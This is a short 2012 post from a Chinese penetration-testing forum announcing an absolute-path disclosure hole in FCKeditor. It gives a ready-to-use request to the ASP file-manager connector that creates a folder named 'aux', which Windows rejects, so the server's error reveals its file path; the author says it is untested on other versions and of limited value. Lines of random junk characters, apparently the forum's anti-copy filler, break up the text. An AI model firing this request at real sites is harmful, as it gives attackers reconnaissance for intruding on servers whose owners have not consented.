中国网络渗透测试联盟
标题:
最新FCKeditor爆绝对路径漏洞
[打印本页]
作者:
admin
时间:
2012-11-21 13:39
标题:
最新FCKeditor爆绝对路径漏洞
代码:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux
0 o: z6 y) l2 }3 w; A
. |; N2 I! `, e4 c
6 U% b+ H a. S2 \
版本未测试。。。
2 Z7 M8 k: i9 m; Y5 Z' d
% V' b' @) q A2 T" M% c; S
原理:新建个aux文件夹,aux在windows系统不支持,所以会报错,爆出绝对路径,这个比较鸡肋。求大神别喷。。。
9 _% V. X, ?+ {3 Q' z
' K: T$ n0 }/ B
2 q, v& r3 c3 Z4 u6 T, {( i' w/ Q
听说IIS都可以。。
8 @8 |, o# `6 q; g" `% I4 |1 `7 B5 S ?
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2